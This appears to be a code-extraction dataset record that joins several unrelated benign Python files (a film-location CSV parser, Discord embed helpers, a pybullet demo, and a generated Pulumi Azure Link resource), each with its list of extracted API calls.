'(hours=sc.t_block_start.hour, minutes=sc.t_block_start.minute)\n', (6047, 6109), False, 'from datetime import datetime, timedelta\n'), ((6421, 6443), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'res'}), '(minutes=res)\n', (6430, 6443), False, 'from datetime import datetime, timedelta\n'), ((11717, 11745), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '""";"""'}), "(f, delimiter=';')\n", (11727, 11745), False, 'import csv\n'), ((15981, 15997), 'os.path.isdir', 'os.path.isdir', (['n'], {}), '(n)\n', (15994, 15997), False, 'import os\n'), ((1668, 1689), 'numpy.repeat', 'np.repeat', (['t[1:-1]', '(2)'], {}), '(t[1:-1], 2)\n', (1677, 1689), True, 'import numpy as np\n'), ((7118, 7139), 'numpy.repeat', 'np.repeat', (['t[1:-1]', '(2)'], {}), '(t[1:-1], 2)\n', (7127, 7139), True, 'import numpy as np\n')] |
"""Functions for transforming raw data about the films into csv"""
from typing import List, Tuple
import pandas as pd
def extract_info(line: str):
"""
Extract information from raw string with information
about the film: title, year and location. If data is
invalid, return None.
"""
try:
# Extract title which is either surrounded with "" or not
if line[0] == '"':
line = line[1:]
title = line[:line.find('"')]
else:
title = line[:line.find(' ')]
# Extract year which is located inside parentheses
year_start_idx = line.find('(')
year = int(line[year_start_idx + 1:year_start_idx + 5])
# Extract location from the
if '\t\t' not in line:
location = line.rsplit('}\t', maxsplit=1)[1]
else:
location = line.rsplit('\t\t', maxsplit=1)[1]
# Clear up the location
location = location.rsplit(
'(', maxsplit=1)[0].replace('\t', '').rsplit('\n')[0]
return title, year, location
except Exception:
# If an error occurs, raw data is invalid
return None
def read_data(filename: str) -> List[Tuple[str, int, str]]:
"""
Read data about films from the given file and transform it into a list.
"""
with open(filename, 'r', errors='ignore') as locations_raw:
lines = locations_raw.readlines()
locations = []
for line in lines:
data = extract_info(line)
if data is None:
continue
locations.append(data)
return locations
def save_data(data: pd.DataFrame, filename: str):
"""
Save the data into a given file.
"""
data.to_csv(filename, index=False)
def transform_data(data: List[Tuple[str, int, str]]) -> pd.DataFrame:
"""
Transform the given data into a DataFrame. Data is expected to
contain information about film titles, years and locations.
"""
df = pd.DataFrame(data, columns=['Title', 'Year', 'Location'])
# Add a column with country name
df['Country'] = df['Location'].str.rsplit(', ').apply(lambda x: x[-1])
# Remove rows where location is equal to country name
df = df[~(df['Country'] == df['Location'])]
# Drop rows with duplicated location
df.drop_duplicates(subset='Location', keep='first', inplace=True)
return df
def main(filename: str, output_filename: str = 'locations.csv'):
"""
Read raw data from the file, transform it into DataFrame and save.
The default output filename is 'locations.csv'.
"""
data = read_data(filename)
df = transform_data(data)
save_data(df, output_filename)
main('locations.list')
| [
"pandas.DataFrame"
] | [((1971, 2028), 'pandas.DataFrame', 'pd.DataFrame', (['data'], {'columns': "['Title', 'Year', 'Location']"}), "(data, columns=['Title', 'Year', 'Location'])\n", (1983, 2028), True, 'import pandas as pd\n')] |
from defs import *
def main() -> None:
"""
Main game logic loop shim.
"""
from providers import cpucheck
cpucheck.instantiate()
if cpucheck.is_over_limit():
return
import logic
logic.main()
module.exports.loop = main
| [
"providers.cpucheck.instantiate",
"logic.main",
"providers.cpucheck.is_over_limit"
] | [((128, 150), 'providers.cpucheck.instantiate', 'cpucheck.instantiate', ([], {}), '()\n', (148, 150), False, 'from providers import cpucheck\n'), ((159, 183), 'providers.cpucheck.is_over_limit', 'cpucheck.is_over_limit', ([], {}), '()\n', (181, 183), False, 'from providers import cpucheck\n'), ((222, 234), 'logic.main', 'logic.main', ([], {}), '()\n', (232, 234), False, 'import logic\n')] |
import discord
import random
def create_embed(text):
embed=discord.Embed(description=text,color=discord.Color.blurple())
return embed
def error_embed(text):
embed=discord.Embed(description=text,color=discord.Color.red())
return embed
| [
"discord.Color.blurple",
"discord.Color.red"
] | [((105, 128), 'discord.Color.blurple', 'discord.Color.blurple', ([], {}), '()\n', (126, 128), False, 'import discord\n'), ((224, 243), 'discord.Color.red', 'discord.Color.red', ([], {}), '()\n', (241, 243), False, 'import discord\n')] |
import pybullet as p
import time
p.connect(p.PhysX)
p.loadPlugin("eglRendererPlugin")
p.loadURDF("plane.urdf")
for i in range (50):
p.loadURDF("r2d2.urdf",[0,0,1+i*2])
p.setGravity(0,0,-10)
while (1):
p.stepSimulation()
time.sleep(1./240.) | [
"pybullet.connect",
"pybullet.setGravity",
"time.sleep",
"pybullet.stepSimulation",
"pybullet.loadURDF",
"pybullet.loadPlugin"
] | [((34, 52), 'pybullet.connect', 'p.connect', (['p.PhysX'], {}), '(p.PhysX)\n', (43, 52), True, 'import pybullet as p\n'), ((53, 86), 'pybullet.loadPlugin', 'p.loadPlugin', (['"""eglRendererPlugin"""'], {}), "('eglRendererPlugin')\n", (65, 86), True, 'import pybullet as p\n'), ((88, 112), 'pybullet.loadURDF', 'p.loadURDF', (['"""plane.urdf"""'], {}), "('plane.urdf')\n", (98, 112), True, 'import pybullet as p\n'), ((171, 194), 'pybullet.setGravity', 'p.setGravity', (['(0)', '(0)', '(-10)'], {}), '(0, 0, -10)\n', (183, 194), True, 'import pybullet as p\n'), ((135, 177), 'pybullet.loadURDF', 'p.loadURDF', (['"""r2d2.urdf"""', '[0, 0, 1 + i * 2]'], {}), "('r2d2.urdf', [0, 0, 1 + i * 2])\n", (145, 177), True, 'import pybullet as p\n'), ((206, 224), 'pybullet.stepSimulation', 'p.stepSimulation', ([], {}), '()\n', (222, 224), True, 'import pybullet as p\n'), ((226, 249), 'time.sleep', 'time.sleep', (['(1.0 / 240.0)'], {}), '(1.0 / 240.0)\n', (236, 249), False, 'import time\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['LinkArgs', 'Link']
@pulumi.input_type
class LinkArgs:
def __init__(__self__, *,
hub_name: pulumi.Input[str],
participant_property_references: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]],
resource_group_name: pulumi.Input[str],
source_interaction_type: pulumi.Input[str],
target_profile_type: pulumi.Input[str],
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
reference_only: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Link resource.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
pulumi.set(__self__, "hub_name", hub_name)
pulumi.set(__self__, "participant_property_references", participant_property_references)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "source_interaction_type", source_interaction_type)
pulumi.set(__self__, "target_profile_type", target_profile_type)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if link_name is not None:
pulumi.set(__self__, "link_name", link_name)
if mappings is not None:
pulumi.set(__self__, "mappings", mappings)
if operation_type is not None:
pulumi.set(__self__, "operation_type", operation_type)
if reference_only is not None:
pulumi.set(__self__, "reference_only", reference_only)
@property
@pulumi.getter(name="hubName")
def hub_name(self) -> pulumi.Input[str]:
"""
The name of the hub.
"""
return pulumi.get(self, "hub_name")
@hub_name.setter
def hub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "hub_name", value)
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@participant_property_references.setter
def participant_property_references(self, value: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]):
pulumi.set(self, "participant_property_references", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Input[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@source_interaction_type.setter
def source_interaction_type(self, value: pulumi.Input[str]):
pulumi.set(self, "source_interaction_type", value)
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Input[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@target_profile_type.setter
def target_profile_type(self, value: pulumi.Input[str]):
pulumi.set(self, "target_profile_type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="linkName")
def link_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the link.
"""
return pulumi.get(self, "link_name")
@link_name.setter
def link_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "link_name", value)
@property
@pulumi.getter
def mappings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@mappings.setter
def mappings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]):
pulumi.set(self, "mappings", value)
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> Optional[pulumi.Input['InstanceOperationType']]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@operation_type.setter
def operation_type(self, value: Optional[pulumi.Input['InstanceOperationType']]):
pulumi.set(self, "operation_type", value)
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> Optional[pulumi.Input[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@reference_only.setter
def reference_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reference_only", value)
class Link(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LinkArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param LinkArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LinkArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
if hub_name is None and not opts.urn:
raise TypeError("Missing required property 'hub_name'")
__props__.__dict__["hub_name"] = hub_name
__props__.__dict__["link_name"] = link_name
__props__.__dict__["mappings"] = mappings
__props__.__dict__["operation_type"] = operation_type
if participant_property_references is None and not opts.urn:
raise TypeError("Missing required property 'participant_property_references'")
__props__.__dict__["participant_property_references"] = participant_property_references
__props__.__dict__["reference_only"] = reference_only
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if source_interaction_type is None and not opts.urn:
raise TypeError("Missing required property 'source_interaction_type'")
__props__.__dict__["source_interaction_type"] = source_interaction_type
if target_profile_type is None and not opts.urn:
raise TypeError("Missing required property 'target_profile_type'")
__props__.__dict__["target_profile_type"] = target_profile_type
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:customerinsights/v20170101:Link"), pulumi.Alias(type_="azure-native:customerinsights:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights:Link"), pulumi.Alias(type_="azure-native:customerinsights/v20170426:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights/v20170426:Link")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Link, __self__).__init__(
'azure-native:customerinsights/v20170101:Link',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Link':
"""
Get an existing Link resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = None
__props__.__dict__["display_name"] = None
__props__.__dict__["link_name"] = None
__props__.__dict__["mappings"] = None
__props__.__dict__["name"] = None
__props__.__dict__["operation_type"] = None
__props__.__dict__["participant_property_references"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["reference_only"] = None
__props__.__dict__["source_interaction_type"] = None
__props__.__dict__["target_profile_type"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
return Link(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="linkName")
def link_name(self) -> pulumi.Output[str]:
"""
The link name.
"""
return pulumi.get(self, "link_name")
@property
@pulumi.getter
def mappings(self) -> pulumi.Output[Optional[Sequence['outputs.TypePropertiesMappingResponse']]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> pulumi.Output[Optional[str]]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Output[Sequence['outputs.ParticipantPropertyReferenceResponse']]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> pulumi.Output[Optional[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Output[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Output[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The hub name.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"pulumi.get",
"pulumi.Alias",
"pulumi.getter",
"pulumi.set",
"pulumi.ResourceOptions",
"pulumi.ResourceOptions.merge"
] | [((3810, 3839), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""hubName"""'}), "(name='hubName')\n", (3823, 3839), False, 'import pulumi\n'), ((4118, 4169), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""participantPropertyReferences"""'}), "(name='participantPropertyReferences')\n", (4131, 4169), False, 'import pulumi\n'), ((4709, 4748), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""resourceGroupName"""'}), "(name='resourceGroupName')\n", (4722, 4748), False, 'import pulumi\n'), ((5093, 5136), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""sourceInteractionType"""'}), "(name='sourceInteractionType')\n", (5106, 5136), False, 'import pulumi\n'), ((5506, 5545), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""targetProfileType"""'}), "(name='targetProfileType')\n", (5519, 5545), False, 'import pulumi\n'), ((6290, 6323), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""displayName"""'}), "(name='displayName')\n", (6303, 6323), False, 'import pulumi\n'), ((6714, 6744), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""linkName"""'}), "(name='linkName')\n", (6727, 6744), False, 'import pulumi\n'), ((7504, 7539), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""operationType"""'}), "(name='operationType')\n", (7517, 7539), False, 'import pulumi\n'), ((7989, 8024), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""referenceOnly"""'}), "(name='referenceOnly')\n", (8002, 8024), False, 'import pulumi\n'), ((17871, 17904), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""displayName"""'}), "(name='displayName')\n", (17884, 17904), False, 'import pulumi\n'), ((18116, 18146), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""linkName"""'}), "(name='linkName')\n", (18129, 18146), False, 'import pulumi\n'), ((18749, 18784), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""operationType"""'}), "(name='operationType')\n", (18762, 18784), False, 'import pulumi\n'), ((19051, 19102), 'pulumi.getter', 'pulumi.getter', ([], {'name': 
'"""participantPropertyReferences"""'}), "(name='participantPropertyReferences')\n", (19064, 19102), False, 'import pulumi\n'), ((19401, 19440), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""provisioningState"""'}), "(name='provisioningState')\n", (19414, 19440), False, 'import pulumi\n'), ((19623, 19658), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""referenceOnly"""'}), "(name='referenceOnly')\n", (19636, 19658), False, 'import pulumi\n'), ((20034, 20077), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""sourceInteractionType"""'}), "(name='sourceInteractionType')\n", (20047, 20077), False, 'import pulumi\n'), ((20287, 20326), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""targetProfileType"""'}), "(name='targetProfileType')\n", (20300, 20326), False, 'import pulumi\n'), ((20524, 20554), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""tenantId"""'}), "(name='tenantId')\n", (20537, 20554), False, 'import pulumi\n'), ((2835, 2877), 'pulumi.set', 'pulumi.set', (['__self__', '"""hub_name"""', 'hub_name'], {}), "(__self__, 'hub_name', hub_name)\n", (2845, 2877), False, 'import pulumi\n'), ((2886, 2978), 'pulumi.set', 'pulumi.set', (['__self__', '"""participant_property_references"""', 'participant_property_references'], {}), "(__self__, 'participant_property_references',\n participant_property_references)\n", (2896, 2978), False, 'import pulumi\n'), ((2983, 3047), 'pulumi.set', 'pulumi.set', (['__self__', '"""resource_group_name"""', 'resource_group_name'], {}), "(__self__, 'resource_group_name', resource_group_name)\n", (2993, 3047), False, 'import pulumi\n'), ((3056, 3128), 'pulumi.set', 'pulumi.set', (['__self__', '"""source_interaction_type"""', 'source_interaction_type'], {}), "(__self__, 'source_interaction_type', source_interaction_type)\n", (3066, 3128), False, 'import pulumi\n'), ((3137, 3201), 'pulumi.set', 'pulumi.set', (['__self__', '"""target_profile_type"""', 'target_profile_type'], {}), "(__self__, 'target_profile_type', 
target_profile_type)\n", (3147, 3201), False, 'import pulumi\n'), ((3953, 3981), 'pulumi.get', 'pulumi.get', (['self', '"""hub_name"""'], {}), "(self, 'hub_name')\n", (3963, 3981), False, 'import pulumi\n'), ((4062, 4097), 'pulumi.set', 'pulumi.set', (['self', '"""hub_name"""', 'value'], {}), "(self, 'hub_name', value)\n", (4072, 4097), False, 'import pulumi\n'), ((4397, 4448), 'pulumi.get', 'pulumi.get', (['self', '"""participant_property_references"""'], {}), "(self, 'participant_property_references')\n", (4407, 4448), False, 'import pulumi\n'), ((4630, 4688), 'pulumi.set', 'pulumi.set', (['self', '"""participant_property_references"""', 'value'], {}), "(self, 'participant_property_references', value)\n", (4640, 4688), False, 'import pulumi\n'), ((4884, 4923), 'pulumi.get', 'pulumi.get', (['self', '"""resource_group_name"""'], {}), "(self, 'resource_group_name')\n", (4894, 4923), False, 'import pulumi\n'), ((5026, 5072), 'pulumi.set', 'pulumi.set', (['self', '"""resource_group_name"""', 'value'], {}), "(self, 'resource_group_name', value)\n", (5036, 5072), False, 'import pulumi\n'), ((5281, 5324), 'pulumi.get', 'pulumi.get', (['self', '"""source_interaction_type"""'], {}), "(self, 'source_interaction_type')\n", (5291, 5324), False, 'import pulumi\n'), ((5435, 5485), 'pulumi.set', 'pulumi.set', (['self', '"""source_interaction_type"""', 'value'], {}), "(self, 'source_interaction_type', value)\n", (5445, 5485), False, 'import pulumi\n'), ((5682, 5721), 'pulumi.get', 'pulumi.get', (['self', '"""target_profile_type"""'], {}), "(self, 'target_profile_type')\n", (5692, 5721), False, 'import pulumi\n'), ((5824, 5870), 'pulumi.set', 'pulumi.set', (['self', '"""target_profile_type"""', 'value'], {}), "(self, 'target_profile_type', value)\n", (5834, 5870), False, 'import pulumi\n'), ((6075, 6106), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (6085, 6106), False, 'import pulumi\n'), ((6231, 6269), 'pulumi.set', 'pulumi.set', 
(['self', '"""description"""', 'value'], {}), "(self, 'description', value)\n", (6241, 6269), False, 'import pulumi\n'), ((6495, 6527), 'pulumi.get', 'pulumi.get', (['self', '"""display_name"""'], {}), "(self, 'display_name')\n", (6505, 6527), False, 'import pulumi\n'), ((6654, 6693), 'pulumi.set', 'pulumi.set', (['self', '"""display_name"""', 'value'], {}), "(self, 'display_name', value)\n", (6664, 6693), False, 'import pulumi\n'), ((6870, 6899), 'pulumi.get', 'pulumi.get', (['self', '"""link_name"""'], {}), "(self, 'link_name')\n", (6880, 6899), False, 'import pulumi\n'), ((6992, 7028), 'pulumi.set', 'pulumi.set', (['self', '"""link_name"""', 'value'], {}), "(self, 'link_name', value)\n", (7002, 7028), False, 'import pulumi\n'), ((7281, 7309), 'pulumi.get', 'pulumi.get', (['self', '"""mappings"""'], {}), "(self, 'mappings')\n", (7291, 7309), False, 'import pulumi\n'), ((7448, 7483), 'pulumi.set', 'pulumi.set', (['self', '"""mappings"""', 'value'], {}), "(self, 'mappings', value)\n", (7458, 7483), False, 'import pulumi\n'), ((7770, 7804), 'pulumi.get', 'pulumi.get', (['self', '"""operation_type"""'], {}), "(self, 'operation_type')\n", (7780, 7804), False, 'import pulumi\n'), ((7927, 7968), 'pulumi.set', 'pulumi.set', (['self', '"""operation_type"""', 'value'], {}), "(self, 'operation_type', value)\n", (7937, 7968), False, 'import pulumi\n'), ((8344, 8378), 'pulumi.get', 'pulumi.get', (['self', '"""reference_only"""'], {}), "(self, 'reference_only')\n", (8354, 8378), False, 'import pulumi\n'), ((8482, 8523), 'pulumi.set', 'pulumi.set', (['self', '"""reference_only"""', 'value'], {}), "(self, 'reference_only', value)\n", (8492, 8523), False, 'import pulumi\n'), ((15994, 16040), 'pulumi.ResourceOptions.merge', 'pulumi.ResourceOptions.merge', (['opts', 'alias_opts'], {}), '(opts, alias_opts)\n', (16022, 16040), False, 'import pulumi\n'), ((17819, 17850), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (17829, 17850), False, 
'import pulumi\n'), ((18063, 18095), 'pulumi.get', 'pulumi.get', (['self', '"""display_name"""'], {}), "(self, 'display_name')\n", (18073, 18095), False, 'import pulumi\n'), ((18256, 18285), 'pulumi.get', 'pulumi.get', (['self', '"""link_name"""'], {}), "(self, 'link_name')\n", (18266, 18285), False, 'import pulumi\n'), ((18537, 18565), 'pulumi.get', 'pulumi.get', (['self', '"""mappings"""'], {}), "(self, 'mappings')\n", (18547, 18565), False, 'import pulumi\n'), ((18704, 18728), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (18714, 18728), False, 'import pulumi\n'), ((18996, 19030), 'pulumi.get', 'pulumi.get', (['self', '"""operation_type"""'], {}), "(self, 'operation_type')\n", (19006, 19030), False, 'import pulumi\n'), ((19329, 19380), 'pulumi.get', 'pulumi.get', (['self', '"""participant_property_references"""'], {}), "(self, 'participant_property_references')\n", (19339, 19380), False, 'import pulumi\n'), ((19564, 19602), 'pulumi.get', 'pulumi.get', (['self', '"""provisioning_state"""'], {}), "(self, 'provisioning_state')\n", (19574, 19602), False, 'import pulumi\n'), ((19979, 20013), 'pulumi.get', 'pulumi.get', (['self', '"""reference_only"""'], {}), "(self, 'reference_only')\n", (19989, 20013), False, 'import pulumi\n'), ((20223, 20266), 'pulumi.get', 'pulumi.get', (['self', '"""source_interaction_type"""'], {}), 